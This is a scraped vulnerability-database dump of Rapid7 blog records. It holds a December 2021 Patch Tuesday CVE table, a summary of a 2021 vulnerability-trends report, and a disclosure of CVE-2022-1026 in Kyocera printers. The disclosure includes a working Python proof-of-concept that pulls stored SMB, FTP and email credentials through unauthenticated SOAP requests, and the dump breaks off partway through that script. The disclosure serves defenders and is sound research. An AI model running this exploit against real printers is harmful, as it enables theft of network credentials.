Microsoft PowerShell Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-43892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43892>) | Microsoft BizTalk ESB Toolkit Spoofing Vulnerability | No | No | 7.4 | No \n[CVE-2021-43225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43225>) | Bot Framework SDK Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-43877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43877>) | ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n### Device Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43899>) | Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n \n### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-42295](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42295>) | Visual Basic for Applications Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-42320](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42320>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2021-43242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43242>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-42309](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42309>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42294>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2021-43255](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43255>) | Microsoft Office Trust Center Spoofing Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43875>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-42293](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42293>) | Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-43256](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43256>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43882>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2021-42311](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42311>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42313](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42313>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42314](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42314>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42315>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-41365](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41365>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42310>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-43889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43889>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2021-43888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43888>) | Microsoft Defender for IoT Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-42312](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42312>) | Microsoft Defender for IOT Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43247](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43247>) | Windows TCP/IP Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43237](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43237>) | Windows Setup Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43239](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43239>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-43231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43231>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43880>) | Windows Mobile Device Management Elevation of Privilege Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-43244](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43244>) | Windows Kernel Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-43246](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43246>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 5.6 | No \n[CVE-2021-43232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43232>) | Windows Event Tracing Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43248](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43248>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43214>) | Web Media Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-43243](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43243>) | VP9 Video Extensions Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43228](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43228>) | SymCrypt Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-43227](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43227>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43235](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43235>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43240](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43240>) | NTFS Set Short Name Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-40452](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40452>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40453>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-41360](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41360>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-43219](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43219>) | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 7.4 | No \n \n### Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43215>) | iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution | No | No | 9.8 | Yes \n[CVE-2021-43238](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43238>) | Windows Remote Access Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43223](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43223>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41333](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41333>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-43229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43229>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43230>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40441>) | Windows Media Center Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43883>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-43234](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43234>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43217](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43217>) | Windows Encrypting File System (EFS) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-43893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43893>) | Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability | No | Yes | 7.5 | No \n[CVE-2021-43245](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43245>) | Windows Digital TV Tuner Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43224](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43224>) | Windows Common Log File System Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43226>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43207>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43233](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43233>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-43222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43222>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-43236](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43236>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-43216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43216>) | Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability | No | No | 6.5 | Yes", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:12:53", "type": "rapid7blog", "title": "Patch Tuesday - December 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40441", "CVE-2021-40452", "CVE-2021-40453", "CVE-2021-4052", "CVE-2021-4053", "CVE-2021-4054", "CVE-2021-4055", "CVE-2021-4056", "CVE-2021-4057", "CVE-2021-4058", "CVE-2021-4059", "CVE-2021-4061", "CVE-2021-4062", "CVE-2021-4063", "CVE-2021-4064", "CVE-2021-4065", "CVE-2021-4066", "CVE-2021-4067", "CVE-2021-4068", "CVE-2021-41333", "CVE-2021-41360", "CVE-2021-41365", "CVE-2021-41379", "CVE-2021-42293", "CVE-2021-42294", "CVE-2021-42295", "CVE-2021-42309", "CVE-2021-42310", "CVE-2021-42311", "CVE-2021-42312", "CVE-2021-42313", "CVE-2021-42314", "CVE-2021-42315", "CVE-2021-42320", "CVE-2021-43207", "CVE-2021-43214", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43225", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43242", "CVE-2021-43243", "CVE-2021-43244", "CVE-2021-43245", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43255", "CVE-2021-43256", "CVE-2021-43875", "CVE-2021-43877", "CVE-2021-43880", "CVE-2021-43882", "CVE-2021-43883", "CVE-2021-43888", "CVE-2021-43889", "CVE-2021-43890", "CVE-2021-43891", "CVE-2021-43892", "CVE-2021-43893", "CVE-2021-43896", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907", "CVE-2021-43908", "CVE-2021-44228"], "modified": "2021-12-14T22:12:53", "id": "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "href": "https://blog.rapid7.com/2021/12/14/patch-tuesday-december-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-28T13:42:40", "description": "![Analyzing the Attack Landscape: Rapid7\u2019s 2021 Vulnerability Intelligence Report](https://blog.rapid7.com/content/images/2022/03/vuln-intel-report.jpg)\n\nEvery year, our research team at Rapid7 analyzes thousands of vulnerabilities to understand root causes, dispel misconceptions, and explain why some flaws are more likely to be exploited than others. By continuously reviewing the vulnerability landscape and sharing our research team\u2019s insights, we hope to help organizations around the world better secure their environments and shore up vulnerabilities to keep bad actors at bay.\n\nToday, we are proud to share [Rapid7\u2019s 2021 Vulnerability Intelligence Report](<https://www.rapid7.com/info/2021-vulnerability-intelligence-report/>), which provides a landscape view of critical vulnerabilities and threats and offers expert analysis of attack vectors and exploitation trends from a truly harrowing year for risk management teams. The report details 50 notable vulnerabilities from 2021, 43 of which were exploited in the wild. We also highlight a number of non-CVE-based attacks, including several significant supply chain security incidents.\n\nIn this post, we\u2019ll take a big-picture look at the threat landscape in 2021 and reinforce key ways for organizations to protect themselves against high-priority vulnerabilities. For more insights and in-depth technical analysis, [download the full report now](<https://www.rapid7.com/info/2021-vulnerability-intelligence-report/>).\n\n## 2021 attack trends\n\nAs many security and IT teams experienced firsthand, 2021 saw notable increases in attack volume, urgency, and complexity. Many of 2021\u2019s critical vulnerabilities were exploited quickly and at scale, dwarfing attacks from previous years and giving businesses little time to shore up defenses in the face of rapidly rising risk. Key findings across the 50 vulnerabilities in this year\u2019s report include:\n\n * A 136% increase in widespread threats over 2020, due in part to attacker economies of scale, like ransomware and coin mining campaigns\n * A significant rise in zero-day attacks\n * Lower time to known exploitation (TTKE) \u2014 a decrease of 71% year over year\n\nWhen a vulnerability is exploited by many attackers across many different organizations and industries, Rapid7 researchers classify that vulnerability as a widespread threat. In one of the year\u2019s more jarring trends, 52% of 2021\u2019s widespread threats began with a [zero-day exploit](<https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/>). These vulnerabilities were discovered and weaponized by adversaries before vendors were able to patch them. A much higher proportion of zero-day attacks are now threatening many organizations from the outset, instead of being used in more targeted operations. 85% of the zero-day exploits in our 2021 data set, like the [Microsoft Exchange ProxyLogon vulnerabilities](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) and [Log4Shell CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), were widespread threats from the start.\n\nAdditional themes from 2021 included an increase in driver-based attacks and injection exploits, as well as ongoing threats to software supply chain integrity. In the full report, our team also enumerates high-level vulnerability root causes and attacker utilities to help readers understand which vulnerabilities may offer easy exploitability or deep access for attackers.\n\n## Examining today\u2019s threat landscape\n\nIn summary, the threat landscape in 2021 was frenetic for many businesses. Not only was the world still grappling with the COVID-19 pandemic, which continued to put pressure on staffing and budgets, but security teams faced a rise in attack complexity and severity. Widespread attacks leveraging vulnerabilities in commonly deployed software were endemic, ransomware prevalence increased sharply, and zero-day exploitation reached an all-time high.\n\nWhile this may sound grim, there is some good news. For one thing, the security industry is better able to detect and analyze zero-day attacks. This, in turn, has helped improve commercial security solutions and open-source rule sets. And while we would never call the rise of ransomware a positive thing for the world, the universality of the threat has spurred more public-private cooperation and driven new recommendations for preventing and recovering from ransomware attacks. \n\nThese are just a few examples of how the threat landscape has evolved \u2014 and how the challenges vulnerability risk management teams face are evolving along with it. We recommend [prioritizing remediation](<https://www.rapid7.com/db/>) for the CVEs in this year\u2019s data set.\n\n## How to manage risk from critical vulnerabilities\n\nAt Rapid7, we believe that research-driven context on vulnerabilities and emergent threats is critical to building forward-looking security programs. In line with that, organizations of all sizes can implement the following battle-tested tactics to minimize easy opportunities for attackers.\n\n * [Asset inventory](<https://www.rapid7.com/fundamentals/security-program-basics/>) is the foundation of any security program. Responding quickly and decisively to high-urgency threats requires knowing which technologies you use across your stack, how they are configured, and who has access to them.\n * Limit and monitor your internet-facing attack surface area. Pay particular attention to security gateway products, such as VPNs and firewalls.\n * Establish emergency zero-day patching procedures and incident response playbooks that go hand-in-hand with [regular patching cycles](<https://www.rapid7.com/fundamentals/patch-management/>).\n * Conduct incident response investigations that look for indicators of compromise (IOCs) and post-exploitation activity during widespread threat events in addition to activating emergency patching protocols.\n * Employ in-depth security measures to protect your development pipelines from supply chain attacks. These pipelines are often targets \u2014 as are developers.\n\nThese are only some of the fundamental ways you can layer security to better protect your organization in the face of widespread and [emergent threats](<https://www.rapid7.com/blog/tag/emergent-threat-response/>). Many of the CVEs in our report can be used in concert with other vulnerabilities to achieve greater impact, so make sure to prioritize remediation of the vulnerabilities we\u2019ve identified and implement control and detection mechanisms across the whole of your environment. We strongly recommend [prioritizing remediation](<https://www.rapid7.com/db/>) for the CVEs in this year\u2019s data set.\n\nRead the [2021 Vulnerability Intelligence Report](<https://www.rapid7.com/info/2021-vulnerability-intelligence-report/>) to see our full list of high-priority CVEs and learn more about attack trends from 2021.\n\n_**Additional reading:**_\n\n * _[CVE-2021-4191: GitLab GraphQL API User Enumeration (FIXED)](<https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/>)_\n * _[Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal](<https://www.rapid7.com/blog/post/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/>)_\n * _[Dropping Files on a Domain Controller Using CVE-2021-43893](<https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/>)_\n * _[The Big Target on Cyber Insurers' Backs](<https://www.rapid7.com/blog/post/2022/02/08/the-big-target-on-cyber-insurers-backs/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T12:30:00", "type": "rapid7blog", "title": "Analyzing the Attack Landscape: Rapid7\u2019s 2021 Vulnerability Intelligence Report", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4191", "CVE-2021-43893", "CVE-2021-44228"], "modified": "2022-03-28T12:30:00", "id": "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "href": "https://blog.rapid7.com/2022/03/28/analyzing-the-attack-landscape-rapid7s-annual-vulnerability-intelligence-report/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T21:08:54", "description": "![CVE-2022-1026: Kyocera Net View Address Book Exposure](https://blog.rapid7.com/content/images/2022/03/kyocera-vuln.jpg)\n\nRapid7 researcher Aaron Herndon has discovered that several models of Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function. This vulnerability is an instance of [CWE-522](<https://cwe.mitre.org/data/definitions/522.html>): Insufficiently Protected Credentials, and has an estimated base CVSS 3.1 score of [8.6](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N&version=3.1>), given that the credentials exposed are used to authenticate to other endpoints, such as external FTP and SMB servers.\n\n## Product description\n\nMany Kyocera multifunction printers (MFPs) can be administered using [Net Viewer](<https://www.kyoceradocumentsolutions.us/en/products/software/KYOCERANETVIEWER.html>). Two such supported and tested models of MFPs are the [ECOSYS M2640idw](<https://www.kyoceradocumentsolutions.us/en/products/mfp/ECOSYSM2640IDW.html>) and the [TASKalfa 406ci](<https://www.kyoceradocumentsolutions.com/hk/en/products/mfp/taskalfa-406ci/>). These printers can be routinely found in both home office and enterprise environments around the world.\n\n## Credit\n\nThis issue, CVE-2022-1026, was discovered by security researcher [Aaron Herndon](<https://twitter.com/ac3lives>) of Rapid7. It is being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Exploitation\n\nKyocera exposes a SOAP API on port 9091/TCP used for remote printer management via the Net Viewer thick client application. While the API supports authentication, and the thick client performs this authentication, while capturing the SOAP requests, it was observed that the specific request to extract an address book, `POST /ws/km-wsdl/setting/address_book` does not require an authenticated session to submit. Those address books, in turn, contain stored email addresses, usernames, and passwords, which are normally used to store scanned documents on external services or send to users over email.\n\n### Exploitation details\n\nIn order to exploit the vulnerability, an attacker need only be on a network that can reach the MFP's listening SOAP service on port 9091/TCP. The screenshot below describes submitting an unauthenticated SOAP request to that service, `POST /ws/km-wsdl/setting/address_book` with the described XML.\n\n![CVE-2022-1026: Kyocera Net View Address Book Exposure](https://blog.rapid7.com/content/images/2022/03/image5-3.png)\n\nThis instructs the printer to prepare an address book object to be downloaded containing all sensitive data configured in the address book. The printer will respond with an address book enumeration object number, which is \u20185\u2019 in this instance:\n\n![CVE-2022-1026: Kyocera Net View Address Book Exposure](https://blog.rapid7.com/content/images/2022/03/image6.png)\n\nOnce that object number is received, an attacker can populate the \u201c<ns1:enumeration>\u201d value with that number in a SOAP request, wsa:Action get_personal_address_list, using the same POST endpoint, as shown below.\n\n![CVE-2022-1026: Kyocera Net View Address Book Exposure](https://blog.rapid7.com/content/images/2022/03/image2-5.png)\n\nThis will return the printer address book with all configured email addresses, FTP credentials, and network SMB file share credentials stored for user scanning to network shares, in fairly readable XML:\n\n![CVE-2022-1026: Kyocera Net View Address Book Exposure](https://blog.rapid7.com/content/images/2022/03/image1-6.png)\n\nFinally, credentials can be harvested from the provided login_password fields:\n\n![CVE-2022-1026: Kyocera Net View Address Book Exposure](https://blog.rapid7.com/content/images/2022/03/image4-5.png)\n\n### Exploit proof of concept\n\nA proof-of-concept (PoC) Python exploit is shown below. Note the time.sleep(5) call, which allows the printer time to first generate the address book.\n\nPoC Python code:\n \n \n \"\"\"\n Kyocera printer exploit\n Extracts sensitive data stored in the printer address book, unauthenticated, including:\n *email addresses\n *SMB file share credentials used to write scan jobs to a network fileshare\n *FTP credentials\n \n Author: Aaron Herndon, @ac3lives (Rapid7)\n Date: 11/12/2021\n Tested versions: \n * ECOSYS M2640idw\n * TASKalfa 406ci\n * \n \n Usage: \n python3 getKyoceraCreds.py printerip\n \"\"\"\n \n import requests\n import xmltodict\n import warnings\n import sys\n import time\n warnings.filterwarnings(\"ignore\")\n \n url = \"https://{}:9091/ws/km-wsdl/setting/address_book\".format(sys.argv[1])\n headers = {'content-type': 'application/soap+xml'}\n # Submit an unauthenticated request to tell the printer that a new address book object creation is required\n body = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:SOAP-ENC=\"http://www.w3.org/2003/05/soap-encoding\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:xop=\"http://www.w3.org/2004/08/xop/include\" xmlns:ns1=\"http://www.kyoceramita.com/ws/km-wsdl/setting/address_book\"><SOAP-ENV:Header><wsa:Action SOAP-ENV:mustUnderstand=\"true\">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/create_personal_address_enumeration</wsa:Action></SOAP-ENV:Header><SOAP-ENV:Body><ns1:create_personal_address_enumerationRequest><ns1:number>25</ns1:number></ns1:create_personal_address_enumerationRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>\"\"\"\n \n response = requests.post(url,data=body,headers=headers, verify=False)\n strResponse = response.content.decode('utf-8')\n #print(strResponse)\n \n \n parsed = xmltodict.parse(strResponse)\n # The SOAP request returns XML with an object ID as an integer stored in kmaddrbook:enumeration. We need this object ID to request the data from the printer.\n getNumber = parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body']['kmaddrbook:create_personal_address_enumerationResponse']['kmaddrbook:enumeration']\n \n body = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:SOAP-ENC=\"http://www.w3.org/2003/05/soap-encoding\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:xop=\"http://www.w3.org/2004/08/xop/include\" xmlns:ns1=\"http://www.kyoceramita.com/ws/km-wsdl/setting/address_book\"><SOAP-ENV:Header><wsa:Action SOAP-ENV:mustUnderstand=\"true\">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/get_personal_address_list</wsa:Action></SOAP-ENV:Header><SOAP-ENV:Body><ns1:get_personal_address_listRequest><ns1:enumeration>{}</ns1:enumeration></ns1:get_personal_address_listRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>\"\"\".format(getNumber)\n \n print(\"Obtained address book object: {}. Waiting for book to populate\".format(getNumber))\n time.sleep(5)\n print(\"Submitting request to retrieve the address book object...\")\n \n \n response = requests.post(url,data=body,headers=headers, verify=False)\n strResponse = response.content.decode('utf-8')\n #rint(strResponse)\n \n parsed = xmltodict.parse(strResponse)\n print(parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body'])\n \n print(\"\\n\\nObtained address book. Review the above response for credentials in objects 